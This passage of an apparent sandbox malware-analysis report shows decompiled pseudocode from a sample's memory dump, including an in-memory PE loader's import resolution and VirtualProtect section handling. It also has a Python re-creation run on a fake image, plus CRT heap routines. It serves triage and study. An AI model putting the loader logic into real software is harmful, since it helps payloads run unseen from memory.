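    """Walk the import directory of an image that is already mapped (RVA == offset
    into `image`) and overwrite every FirstThunk slot with the resolved address.
    Returns (success, loaded_modules, [(dll, symbol, address), ...])."""
    modules, patched = [], []
    import_rva = u32(image, nt_off + IMPORT_DIR_OFF)
    if u32(image, nt_off + IMPORT_DIR_OFF + 4) == 0:   # DataDirectory[IMPORT].Size
        return True, modules, patched
    desc = import_rva
    while desc + IMPORT_DESC_SIZE <= len(image):      # stands in for IsBadReadPtr(desc, 0x14)
        orig_first_thunk = u32(image, desc + 0x00)
        name_rva         = u32(image, desc + 0x0C)
        first_thunk      = u32(image, desc + 0x10)
        if name_rva == 0:                              # all-zero terminator descriptor
            break
        dll = cstr(image, name_rva)
        handle = load_library(dll)                     # the callback at _a4 + 0x24
        if handle is None:                             # assumed: abort as MemoryModule does
            return False, modules, patched
        modules.append(handle)                         # the array at _a4 + 8, count at _a4 + 0xc
        # OriginalFirstThunk is the lookup table; if absent, FirstThunk serves as both
        thunk_ref = orig_first_thunk if orig_first_thunk else first_thunk
        func_ref = first_thunk
        while True:
            entry = u32(image, thunk_ref)
            if entry == 0:
                break
            if entry & ORDINAL_FLAG32:                 # ordinal import: IMAGE_ORDINAL32(entry)
                symbol = entry & 0xFFFF
            else:                                      # IMAGE_IMPORT_BY_NAME: 2-byte Hint, then Name
                symbol = cstr(image, entry + 2)
            address = get_proc_address(handle, symbol) # the callback at _a4 + 0x28
            if address is None:
                return False, modules, patched
            struct.pack_into("<I", image, func_ref, address)   # the "*_v24 = result" store
            patched.append((dll, symbol, address))
            thunk_ref += 4
            func_ref += 4
        desc += IMPORT_DESC_SIZE
    return True, modules, patched


# Constructed stand-ins for the loader callbacks; the addresses are made up.
FAKE_DLLS = {
    "kernel32.dll": {"LoadLibraryA": 0x7C801D7B, "GetProcAddress": 0x7C80AE40},
    "user32.dll":   {"MessageBoxA": 0x7E4507EA, 125: 0x7E4511AA},
}


def fake_load_library(name):
    return name.lower() if name.lower() in FAKE_DLLS else None


def fake_get_proc_address(handle, symbol):
    return FAKE_DLLS[handle].get(symbol)


def build_sample_image():
    """A constructed 1 KiB 'mapped image': NT headers at 0x40, two import descriptors
    at 0x200 (the second without OriginalFirstThunk), names and thunks behind them."""
    img = bytearray(0x400)
    nt_off = 0x40
    img[nt_off:nt_off + 4] = b"PE\0\0"
    struct.pack_into("<II", img, nt_off + IMPORT_DIR_OFF, 0x200, 3 * IMPORT_DESC_SIZE)
    img[0x280:0x28D] = b"kernel32.dll\0"
    img[0x290:0x29B] = b"user32.dll\0"
    img[0x2A0:0x2AF] = b"\0\0LoadLibraryA\0"      # IMAGE_IMPORT_BY_NAME entries
    img[0x2B0:0x2C1] = b"\0\0GetProcAddress\0"
    img[0x2D0:0x2DE] = b"\0\0MessageBoxA\0"
    # IMAGE_IMPORT_DESCRIPTOR: OriginalFirstThunk, TimeDateStamp, ForwarderChain, Name, FirstThunk
    struct.pack_into("<5I", img, 0x200, 0x300, 0, 0, 0x280, 0x340)
    struct.pack_into("<5I", img, 0x214, 0x000, 0, 0, 0x290, 0x360)   # 0x228 stays all-zero
    struct.pack_into("<3I", img, 0x300, 0x2A0, 0x2B0, 0)             # kernel32 lookup table
    struct.pack_into("<3I", img, 0x340, 0x2A0, 0x2B0, 0)             # kernel32 IAT (gets patched)
    struct.pack_into("<3I", img, 0x360, 0x2D0, ORDINAL_FLAG32 | 125, 0)  # user32 IAT, ordinal 125
    return img, nt_off


def demo():
    img, nt_off = build_sample_image()
    ok, modules, patched = resolve_imports(img, nt_off, fake_load_library, fake_get_proc_address)
    return ok, modules, patched, u32(img, 0x340), u32(img, 0x364), u32(img, 0x300)


if __name__ == "__main__":
    for item in demo():
        print(item)
```

For triage this matters in two ways: the image whose imports this routine fills in is the unpacked payload, so dumping the region at `_v20` once the loop has finished yields a PE with a resolved IAT, and a breakpoint on the callback stored at `_a4 + 0x28` logs every API name the payload asks for before it runs.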
                                                                                                                                                C-Code - Quality: 34%
                                                                                                                                                			E1001AB60(intOrPtr* _a4) {
                                                                                                                                                				void* _v8;
                                                                                                                                                				intOrPtr* _v12;
                                                                                                                                                				void* _v16;
                                                                                                                                                				intOrPtr _v20;
                                                                                                                                                				void* _v24;
                                                                                                                                                				void* _v28;
                                                                                                                                                				signed int* _v32;
                                                                                                                                                				void* _v36;
                                                                                                                                                				intOrPtr _v40;
                                                                                                                                                				void* __ebp;
                                                                                                                                                				void* _t108;
                                                                                                                                                				void* _t110;
                                                                                                                                                				void* _t113;
                                                                                                                                                				void* _t115;
                                                                                                                                                				void* _t122;
                                                                                                                                                				void* _t130;
                                                                                                                                                				void _t132;
                                                                                                                                                				void _t137;
                                                                                                                                                				void* _t144;
                                                                                                                                                				void* _t159;
                                                                                                                                                				void* _t194;
                                                                                                                                                				void* _t201;
                                                                                                                                                				void* _t202;
                                                                                                                                                				void* _t203;
                                                                                                                                                				void* _t204;
                                                                                                                                                
                                                                                                                                                				_t2 = _a4 + 4; // 0xe90575c0
                                                                                                                                                				_v20 =  *_t2;
                                                                                                                                                				_v16 = 1;
                                                                                                                                                				_v12 =  *_a4 + 0x80;
                                                                                                                                                				if( *((intOrPtr*)(_v12 + 4)) != 0) {
                                                                                                                                                					_v8 = _v20 +  *_v12;
                                                                                                                                                					while(1) {
                                                                                                                                                						_t108 = IsBadReadPtr(_v8, 0x14);
                                                                                                                                                						__eflags = _t108;
                                                                                                                                                						if(_t108 != 0) {
                                                                                                                                                							break;
                                                                                                                                                						}
                                                                                                                                                						_t110 = _v8;
                                                                                                                                                						__eflags =  *(_t110 + 0xc);
                                                                                                                                                						if( *(_t110 + 0xc) == 0) {
                                                                                                                                                							break;
                                                                                                                                                						}
                                                                                                                                                						_t18 = _a4 + 0x34; // 0x118bb84d
                                                                                                                                                						_t23 = _a4 + 0x24; // 0xf3c7e850, executed
                                                                                                                                                						_t113 =  *((intOrPtr*)( *_t23))(_v20 +  *((intOrPtr*)(_v8 + 0xc)),  *_t18); // executed
                                                                                                                                                						_t204 = _t203 + 8;
                                                                                                                                                						_v36 = _t113;
                                                                                                                                                						__eflags = _v36;
                                                                                                                                                						if(__eflags != 0) {
                                                                                                                                                							_t28 = _a4 + 0xc; // 0x52b8558b
                                                                                                                                                							_push(4 +  *_t28 * 4);
                                                                                                                                                							_t32 = _a4 + 8; // 0x98
                                                                                                                                                							_push( *_t32);
                                                                                                                                                							_t115 = E1000E018(_t144,  *_t32, _t201, _t202, __eflags);
                                                                                                                                                							_t203 = _t204 + 8;
                                                                                                                                                							_v28 = _t115;
                                                                                                                                                							__eflags = _v28;
                                                                                                                                                							if(_v28 != 0) {
                                                                                                                                                								 *(_a4 + 8) = _v28;
                                                                                                                                                								_t45 = _a4 + 0xc; // 0x52b8558b
                                                                                                                                                								_t47 = _a4 + 8; // 0x98
                                                                                                                                                								 *((intOrPtr*)( *_t47 +  *_t45 * 4)) = _v36;
                                                                                                                                                								_t52 = _a4 + 0xc; // 0x52b8558b
                                                                                                                                                								 *(_a4 + 0xc) =  *_t52 + 1;
                                                                                                                                                								__eflags =  *_v8;
                                                                                                                                                								if( *_v8 == 0) {
                                                                                                                                                									_v32 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
									_t122 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
									__eflags = _t122;
									_v24 = _t122;
								} else {
									_v32 = _v20 +  *_v8;
									_v24 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
								}
								while(1) {
									__eflags =  *_v32;
									if( *_v32 == 0) {
										break;
									}
									__eflags =  *_v32 & 0x80000000;
									if(( *_v32 & 0x80000000) == 0) {
										_v40 = _v20 +  *_v32;
										_t88 = _a4 + 0x34; // 0x118bb84d
										_t130 = _v40 + 2;
										__eflags = _t130;
										_t92 = _a4 + 0x28; // 0xc483ffff
										_t132 =  *((intOrPtr*)( *_t92))(_v36, _t130,  *_t88);
										_t203 = _t203 + 0xc;
										 *_v24 = _t132;
									} else {
										_t78 = _a4 + 0x34; // 0x118bb84d
										_t82 = _a4 + 0x28; // 0xc483ffff
										_t137 =  *((intOrPtr*)( *_t82))(_v36,  *_v32 & 0x0000ffff,  *_t78);
										_t203 = _t203 + 0xc;
										 *_v24 = _t137;
									}
									__eflags =  *_v24;
									if( *_v24 != 0) {
										_v32 =  &(_v32[1]);
										_t194 = _v24 + 4;
										__eflags = _t194;
										_v24 = _t194;
										continue;
									} else {
										_v16 = 0;
										break;
									}
								}
								__eflags = _v16;
								if(_v16 != 0) {
									_t159 = _v8 + 0x14;
									__eflags = _t159;
									_v8 = _t159;
									continue;
								}
								_t98 = _a4 + 0x34; // 0x118bb84d
								_t101 = _a4 + 0x2c; // 0x75c08504
								 *((intOrPtr*)( *_t101))(_v36,  *_t98);
								SetLastError(0x7f);
								break;
							}
							_t36 = _a4 + 0x34; // 0x118bb84d
							_t39 = _a4 + 0x2c; // 0x75c08504
							 *((intOrPtr*)( *_t39))(_v36,  *_t36);
							SetLastError(0xe);
							_v16 = 0;
							break;
						}
						SetLastError(0x7e);
						_v16 = 0;
						break;
					}
					return _v16;
				}
				return 1;
			}


APIs
• IsBadReadPtr.KERNEL32(00000000,00000014), ref: 1001ABB2
• SetLastError.KERNEL32(0000007E), ref: 1001ABF4
Memory Dump Source
• Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp
• Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp
• Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp
Similarity
• API ID: ErrorLastRead
• String ID:
• API String ID: 4100373531-0
• Opcode ID: 59b7c28c5a6a2055bc3ad19a487945ad965c1c3e153a6a88f5d4a819af12ce5d
• Instruction ID: ee799e3b8b260964baacb2eb61f61a8d535858b77694984a1748e2a29b669165
• Opcode Fuzzy Hash: 59b7c28c5a6a2055bc3ad19a487945ad965c1c3e153a6a88f5d4a819af12ce5d
• Instruction Fuzzy Hash: ED81A3B4A00209DFDB04CF94D881AAEB7F1FF89355F248158E819AB351D735EA82CF90
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 16%
			E1000C9E0(intOrPtr* __eax, void* __edx, void* __edi) {
				intOrPtr* _t14;
				intOrPtr* _t17;
				intOrPtr _t20;
				intOrPtr _t36;
				intOrPtr* _t38;

				 *__eax =  *__eax + __edx;
				 *0xba =  *0xba + __edx;
				asm("rol dh, 0x0");
				asm("adc [edx+edi*4], ah");
				 *0xba =  *0xba + __edx;
				 *0x00000178 =  *((intOrPtr*)(0x178)) + __edx;
				asm("adc dl, al");
				 *((intOrPtr*)(0x178)) =  *((intOrPtr*)(0x178)) + __edx;
				 *((intOrPtr*)(0x178)) =  *((intOrPtr*)(0x178)) + __edx;
				_t14 = _t38;
				 *_t14 =  *_t14 + __edx;
                                                                                                                                                				 *_t14 =  *_t14 + __edx;
                                                                                                                                                				_push(es);
                                                                                                                                                				 *_t14 =  *_t14 + __edx;
                                                                                                                                                				asm("repne rol byte [eax], 0x10");
                                                                                                                                                				asm("adc eax, ebp");
                                                                                                                                                				 *_t14 =  *_t14 + __edx;
                                                                                                                                                				asm("adc [ebx-0x40], ah");
                                                                                                                                                				 *_t14 =  *_t14 + __edx;
                                                                                                                                                				asm("adc [edx+0xc], ch");
                                                                                                                                                				_push(0xc);
                                                                                                                                                				_push(0x103301d0);
                                                                                                                                                				_t15 = E10010534(__eax, __edi, 0xffffffffc29f1178);
                                                                                                                                                				_t36 =  *0x00000180;
                                                                                                                                                				if(_t36 != 0) {
                                                                                                                                                					if( *0x10335f3c != 3) {
                                                                                                                                                						_push(_t36);
                                                                                                                                                						goto L8;
                                                                                                                                                					} else {
                                                                                                                                                						L1000FA03(4);
                                                                                                                                                						 *0x00000174 =  *0x00000174 & 0x00000000;
                                                                                                                                                						_t20 = E1000FA7C(_t36);
                                                                                                                                                						 *0x0000015C = _t20;
                                                                                                                                                						if(_t20 != 0) {
                                                                                                                                                							_push(_t36);
                                                                                                                                                							_push(_t20);
                                                                                                                                                							E1000FAA7();
                                                                                                                                                						}
                                                                                                                                                						 *0x00000174 = 0xfffffffe;
                                                                                                                                                						_t15 = E1000CA86();
                                                                                                                                                						if( *((intOrPtr*)(0x15c)) == 0) {
                                                                                                                                                							_push( *((intOrPtr*)(0x180)));
                                                                                                                                                							L8:
                                                                                                                                                							_push(0);
                                                                                                                                                							_t15 = RtlFreeHeap( *0x10333310); // executed
                                                                                                                                                							_t47 = _t15;
                                                                                                                                                							if(_t15 == 0) {
                                                                                                                                                								_t17 = E1000F720(_t47);
                                                                                                                                                								 *_t17 = E1000F6E5(GetLastError());
                                                                                                                                                							}
                                                                                                                                                						}
                                                                                                                                                					}
                                                                                                                                                				}
                                                                                                                                                				return E10010579(_t15);
                                                                                                                                                			}
                                                                                                                                                 Instruction addresses for E1000C9E0: 0x1000c9e2 through 0x1000cabd (per-line address column of the decompiler listing; the paired instructions are not present in this extract)

                                                                                                                                                APIs
                                                                                                                                                • ___sbh_find_block.LIBCMT ref: 1000CA59
                                                                                                                                                • ___sbh_free_block.LIBCMT ref: 1000CA68
                                                                                                                                                • RtlFreeHeap.NTDLL(00000000,?,103301D0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,103301D0), ref: 1000CAA9
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                 • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                 • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                 • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                 • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                 • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorFreeHeapLast___sbh_find_block___sbh_free_block
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2661975262-0
                                                                                                                                                • Opcode ID: f7b2ddd2de68202b80087eaa9991a68d173fd62693897be16f3547a6da0e59f9
                                                                                                                                                • Instruction ID: 9c104269e25e09b57b0ea87c9849c440b78dd2ca8add8690c261728b6e664737
                                                                                                                                                • Opcode Fuzzy Hash: f7b2ddd2de68202b80087eaa9991a68d173fd62693897be16f3547a6da0e59f9
                                                                                                                                                • Instruction Fuzzy Hash: 4921F17AA0E3C55FEB02CB705C957597F609F07295F0A009AE0849B1E7DB689C448BA2
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 27%
                                                                                                                                                			E1000CA30(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                				intOrPtr* _t10;
                                                                                                                                                				intOrPtr _t13;
                                                                                                                                                				intOrPtr _t23;
                                                                                                                                                				void* _t25;
                                                                                                                                                
                                                                                                                                                				_push(0xc);
                                                                                                                                                				_push(0x103301d0);
                                                                                                                                                				_t8 = E10010534(__ebx, __edi, __esi);
                                                                                                                                                				_t23 =  *((intOrPtr*)(_t25 + 8));
                                                                                                                                                				if(_t23 == 0) {
                                                                                                                                                					L9:
                                                                                                                                                					return E10010579(_t8);
                                                                                                                                                				}
                                                                                                                                                				if( *0x10335f3c != 3) {
                                                                                                                                                					_push(_t23);
                                                                                                                                                					L7:
                                                                                                                                                					_push(0);
                                                                                                                                                					_t8 = RtlFreeHeap( *0x10333310); // executed
                                                                                                                                                					_t31 = _t8;
                                                                                                                                                					if(_t8 == 0) {
                                                                                                                                                						_t10 = E1000F720(_t31);
                                                                                                                                                						 *_t10 = E1000F6E5(GetLastError());
                                                                                                                                                					}
                                                                                                                                                					goto L9;
                                                                                                                                                				}
                                                                                                                                                				L1000FA03(4);
                                                                                                                                                				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
                                                                                                                                                				_t13 = E1000FA7C(_t23);
                                                                                                                                                				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
                                                                                                                                                				if(_t13 != 0) {
                                                                                                                                                					_push(_t23);
                                                                                                                                                					_push(_t13);
                                                                                                                                                					E1000FAA7();
                                                                                                                                                				}
                                                                                                                                                				 *(_t25 - 4) = 0xfffffffe;
                                                                                                                                                				_t8 = E1000CA86();
                                                                                                                                                				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
                                                                                                                                                					goto L9;
                                                                                                                                                				} else {
                                                                                                                                                					_push( *((intOrPtr*)(_t25 + 8)));
                                                                                                                                                					goto L7;
                                                                                                                                                				}
                                                                                                                                                			}
                                                                                                                                                 Instruction addresses for E1000CA30: 0x1000ca30 through 0x1000cabd (per-line address column of the decompiler listing; the paired instructions are not present in this extract)
                                                                                                                                                0x1000ca68
                                                                                                                                                0x1000ca6e
                                                                                                                                                0x1000ca6f
                                                                                                                                                0x1000ca76
                                                                                                                                                0x1000ca7f
                                                                                                                                                0x00000000
                                                                                                                                                0x1000ca81
                                                                                                                                                0x1000ca81
                                                                                                                                                0x00000000
                                                                                                                                                0x1000ca81

APIs
• ___sbh_find_block.LIBCMT ref: 1000CA59
• ___sbh_free_block.LIBCMT ref: 1000CA68
• RtlFreeHeap.NTDLL(00000000,?,103301D0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
• GetLastError.KERNEL32(?,?,?,?,?,?,?,103301D0), ref: 1000CAA9
Memory Dump Source
• Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp
• Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp
• Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp
Similarity
• API ID: ErrorFreeHeapLast___sbh_find_block___sbh_free_block
• String ID:
• API String ID: 2661975262-0
• Opcode ID: a68615f68ae273e04c94104649a1a2c56dbb06faf4eb5eaf6823c23e20caab59
• Instruction ID: 2e61d7c1472293ced8f4caaf087b0bb9b243e5b1bf119dcbb98009236a764642
• Opcode Fuzzy Hash: a68615f68ae273e04c94104649a1a2c56dbb06faf4eb5eaf6823c23e20caab59
• Instruction Fuzzy Hash: BF016775B0131A9AFB10DBB49C45B5E76A4DF013E5F104109F514AA0D5CF38A940DF56
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 73%
/* Sandbox decompilation. The call pattern (heap-handle check, then
 * __FF_MSGBANNER / __NMSG_WRITE(0x1e) / exit(0xff); ___sbh_alloc_block;
 * RtlAllocateHeap; the constant 0xc stored through a returned pointer; a retry
 * loop around a callback) is that of the statically linked CRT malloc wrapper,
 * i.e. library code (LIBCMT) rather than the sample's own logic. The role
 * comments on the globals and unnamed callees below are inferences from that
 * pattern, not symbols recovered from the binary. */
E1000CE64(void* __edx) {
	void* __ebx;
	void* __edi;
	void* __esi;
	intOrPtr _t1;
	void* _t2;
	void* _t6;
	void* _t10;
	void* _t12;
	void* _t18;
	void* _t20;
	void* _t22;
	intOrPtr _t24;
	void* _t28;
	void* _t30;
	void* _t32;

	_t18 = __edx;
	_t12 = HeapAlloc;
	do {
		_t32 =  *0x10333310; // 0x2230000 - CRT heap handle
		_t20 = _t30;          // _t30 carries the requested size; the decompiler left it unnamed
		if(_t32 == 0) {
			// CRT heap not initialised: banner, message 0x1e, then exit(0xff)
			E100119E6(_t12, _t18, _t20, _t32); // __FF_MSGBANNER
			E10011846(0x1e);                   // __NMSG_WRITE
			E100115A8(0xff);                   // ___crtCorExitProcess / ExitProcess
		}
		_t1 =  *0x10335f3c; // 0x1 - active-heap selector (1 = plain process heap, 3 = small-block heap)
		if(_t1 != 1) {
			__eflags = _t1 - 3;
			if(__eflags != 0) {
				L10:
				// generic path: a zero-byte request becomes one byte, rounded up to 16
				__eflags = _t30;
				if(_t30 == 0) {
					_t20 = 1;
					__eflags = 1;
				}
				_t22 = _t20 + 0x0000000f & 0xfffffff0;
				__eflags = _t22;
				_push(_t22);
				goto L13;
			} else {
				_push(_t30);
				_t2 = E1000CE07(_t12, _t20, 0, __eflags); // ___sbh_alloc_block
				__eflags = _t2;
				if(__eflags == 0) {
					goto L10; // small-block heap declined: fall back to the process heap
				}
			}
		} else {
			// plain heap: size passed through unrounded, zero becomes 1
			if(_t30 == 0) {
				_t10 = 1;
				__eflags = 1;
			} else {
				_t10 = _t30;
			}
			_push(_t10);
			L13:
			_push(0);
			_t2 = RtlAllocateHeap( *0x10333310); // executed - HeapAlloc(heap, 0, size)
		}
		_t28 = _t2;
		if(_t28 == 0) {
			_t24 = 0xc; // ENOMEM
			if( *0x103337d4 == _t2) { // "new mode" flag is 0: fail without retrying
				 *((intOrPtr*)(E1000F720(__eflags))) = _t24; // errno = ENOMEM
				L19:
				 *((intOrPtr*)(E1000F720(_t37))) = _t24; // _t37 is only assigned at L16; decompiler artifact
			} else {
				goto L16;
			}
		}
		return _t28;
		L16:
		_t6 = E100108CA(_t30); // invoke the registered new handler; non-zero means "retry"
		_t37 = _t6;
	} while (_t6 != 0);
	goto L19; // handler gave up: errno = ENOMEM, return NULL
}

Address column of the E1000CE64 listing above (instructions 0x1000ce64 to 0x1000cf02); the per-line addresses are not reproduced here.

APIs
• __FF_MSGBANNER.LIBCMT ref: 1000CE79
  • Part of subcall function 100119E6: __NMSG_WRITE.LIBCMT ref: 10011A0D
  • Part of subcall function 100119E6: __NMSG_WRITE.LIBCMT ref: 10011A17
• __NMSG_WRITE.LIBCMT ref: 1000CE80
  • Part of subcall function 10011846: _strcpy_s.LIBCMT ref: 100118B2
  • Part of subcall function 10011846: __invoke_watson.LIBCMT ref: 100118C3
  • Part of subcall function 10011846: GetModuleFileNameA.KERNEL32(00000000,103334D9,00000104,?,103332E0,00000000), ref: 100118DF
  • Part of subcall function 10011846: _strcpy_s.LIBCMT ref: 100118F4
  • Part of subcall function 10011846: __invoke_watson.LIBCMT ref: 10011907
  • Part of subcall function 10011846: _strlen.LIBCMT ref: 10011910
  • Part of subcall function 10011846: _strlen.LIBCMT ref: 1001191D
  • Part of subcall function 10011846: __invoke_watson.LIBCMT ref: 1001194A
  • Part of subcall function 100115A8: ___crtCorExitProcess.LIBCMT ref: 100115AC
  • Part of subcall function 100115A8: ExitProcess.KERNEL32 ref: 100115B6
  • Part of subcall function 1000CE07: ___sbh_alloc_block.LIBCMT ref: 1000CE2F
                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 1000CECE
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                 • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                 • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                 • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                 • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                 • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: __invoke_watson$ExitProcess_strcpy_s_strlen$AllocateFileHeapModuleName___crt___sbh_alloc_block
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3791426274-0
                                                                                                                                                • Opcode ID: ac007278a4e0de9d752827624b5274de92f56d31190f61e6d2d2646ba59319ec
                                                                                                                                                • Instruction ID: 6f1a83c6d6f502121b77b2a43b6d62c081e19aaa5c93b61cf19e771af3aa1e29
                                                                                                                                                • Opcode Fuzzy Hash: ac007278a4e0de9d752827624b5274de92f56d31190f61e6d2d2646ba59319ec
                                                                                                                                                • Instruction Fuzzy Hash: 5401F936B493EE9AF221D765DCC1D6E72CDDBC16F0F220126F948CA59ACB60DC8142E1
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 86%
                                                                                                                                                			E1001B1C0(intOrPtr* _a4, void** _a8) {
                                                                                                                                                				long _v8;
                                                                                                                                                				signed int _v12;
                                                                                                                                                				signed int _v16;
                                                                                                                                                				signed int _v20;
                                                                                                                                                				signed int _v24;
                                                                                                                                                				int _t67;
                                                                                                                                                
                                                                                                                                                				if(_a8[2] != 0) {
                                                                                                                                                					_t4 =  &(_a8[3]); // 0x1
                                                                                                                                                					if(( *_t4 & 0x02000000) == 0) {
                                                                                                                                                						_t31 =  &(_a8[3]); // 0x1
                                                                                                                                                						asm("sbb edx, edx");
                                                                                                                                                						_v16 =  ~( ~( *_t31 & 0x20000000));
                                                                                                                                                						_t34 =  &(_a8[3]); // 0x1
                                                                                                                                                						asm("sbb ecx, ecx");
                                                                                                                                                						_v24 =  ~( ~( *_t34 & 0x40000000));
                                                                                                                                                						_t37 =  &(_a8[3]); // 0x1
                                                                                                                                                						asm("sbb eax, eax");
                                                                                                                                                						_v12 =  ~( ~( *_t37 & 0x80000000));
                                                                                                                                                						_t42 = _v24 * 8; // 0x2034e6cd
                                                                                                                                                						_v20 =  *((intOrPtr*)((_v16 << 4) + _t42 + 0x103330c4 + _v12 * 4));
                                                                                                                                                						_t49 =  &(_a8[3]); // 0x1
                                                                                                                                                						if(( *_t49 & 0x04000000) != 0) {
                                                                                                                                                							_v20 = _v20 | 0x00000200;
                                                                                                                                                						}
                                                                                                                                                						_t55 =  &(_a8[2]); // 0xb805ebc0
                                                                                                                                                						_t67 = VirtualProtect( *_a8,  *_t55, _v20,  &_v8); // executed
                                                                                                                                                						if(_t67 != 0) {
                                                                                                                                                							return 1;
                                                                                                                                                						} else {
                                                                                                                                                							_push("Error protecting memory page");
                                                                                                                                                							E1001AE60(_t67);
                                                                                                                                                							return 0;
                                                                                                                                                						}
                                                                                                                                                					}
                                                                                                                                                					_t7 =  &(_a8[1]); // 0x330475c0
                                                                                                                                                					if( *_a8 !=  *_t7) {
                                                                                                                                                						L8:
                                                                                                                                                						return 1;
                                                                                                                                                					}
                                                                                                                                                					if(_a8[4] != 0 ||  *((intOrPtr*)( *_a4 + 0x38)) ==  *(_a4 + 0x3c)) {
                                                                                                                                                						L7:
                                                                                                                                                						_t26 =  &(_a8[2]); // 0xb805ebc0
                                                                                                                                                						 *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x20))))( *_a8,  *_t26, 0x4000,  *((intOrPtr*)(_a4 + 0x34))); // executed
                                                                                                                                                						goto L8;
                                                                                                                                                					} else {
                                                                                                                                                						_t16 =  &(_a8[2]); // 0xb805ebc0
                                                                                                                                                						if( *_t16 %  *(_a4 + 0x3c) != 0) {
                                                                                                                                                							goto L8;
                                                                                                                                                						}
                                                                                                                                                						goto L7;
                                                                                                                                                					}
                                                                                                                                                				}
                                                                                                                                                				return 1;
                                                                                                                                                 			}

                                                                                                                                                Strings
                                                                                                                                                • Error protecting memory page, xrefs: 1001B2DD
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                 • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                 • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                 • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                 • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                 • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: Error protecting memory page
                                                                                                                                                • API String ID: 0-1748499907
                                                                                                                                                • Opcode ID: fa3f9b01b46355d1ec19b93347b7561b613cc618b83ed61fa7cf9da906a09f9b
                                                                                                                                                • Instruction ID: 8d650c0da19698877930e2c5171e1c21c57976ae84b1b649a9511697b3bf2f19
                                                                                                                                                • Opcode Fuzzy Hash: fa3f9b01b46355d1ec19b93347b7561b613cc618b83ed61fa7cf9da906a09f9b
                                                                                                                                                • Instruction Fuzzy Hash: EB41D774A005099FD748DF58C490BA9B3B2FB88310F14C259EC1A8F355C731EE85CB80
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E1000F7BF(intOrPtr _a4) {
                                                                                                                                                				void* _t6;
                                                                                                                                                				intOrPtr _t7;
                                                                                                                                                				void* _t10;
                                                                                                                                                
                                                                                                                                                				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                                                                                                                                                				 *0x10333310 = _t6;
                                                                                                                                                				if(_t6 != 0) {
                                                                                                                                                					_t7 = E1000F764(__eflags);
                                                                                                                                                					__eflags = _t7 - 3;
                                                                                                                                                					 *0x10335f3c = _t7;
                                                                                                                                                					if(_t7 != 3) {
                                                                                                                                                						L5:
                                                                                                                                                						__eflags = 1;
                                                                                                                                                						return 1;
                                                                                                                                                					} else {
                                                                                                                                                						_t10 = E1000FA34(0x3f8);
                                                                                                                                                						__eflags = _t10;
						if(_t10 != 0) {
							goto L5;
						} else {
